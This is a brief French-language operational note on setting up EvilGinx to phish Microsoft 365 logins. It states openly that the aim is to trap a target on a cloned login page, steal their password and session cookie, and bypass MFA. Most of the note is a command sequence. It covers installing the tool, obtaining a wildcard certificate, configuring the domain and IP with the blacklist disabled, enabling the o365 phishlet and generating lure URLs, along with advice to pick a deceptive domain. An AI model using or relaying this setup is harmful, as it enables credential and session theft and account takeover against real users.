EvilGinx

Def et fonctionnement :


https://github.com/BakkerJan/evilginx2
EvilGinx est un outil de duplication de page d'authentification disponible pour plusieurs services d'authentification. Le but est de leurer une cible dans notre piège et le forcer à s'authentifier sur notre copie du site afin de récupérer son password et son cookie de session. Ce système permet de contourner le MFA

Exploitation :


Pour effectuer cette attaque plusieurs prérequis sont nécessaires :

sudo apt-get -y install git make
git clone https://github.com/BakkerJan/evilginx2.git
cd evilginx2
make
sudo make install

Créer le certificat :
On va utiliser certbot :

sudo apt -y install certbot 
sudo certbot certonly --manual --preferred-challenges=dns --server https://acme-v02.api.letsencrypt.org/directory --agree-tos -d *.test.domain.com --email noreply@live.com  

Lancer EvilGINX :

sudo evilginx

Ensuite il faut configurer un nom de domaine qui colle un peu pour endormir la vigilence.

Configurer EvilGINX :

Configurer le serveur EvilGINX :

config domain test.domain.com
config ip <ip>
blacklist off 

Configurer O365 :

phishlets hostname o365 test.domain.com
phishlets enable o365

Configurer le luring :

lures create o365
lures get-url 0

Démo :


Une démo complète est disponible dans l'article Phase 2. Getting a Login.
Sinon il suffit de récupérer l'url de lure pour se connecter et voir les résultats en live.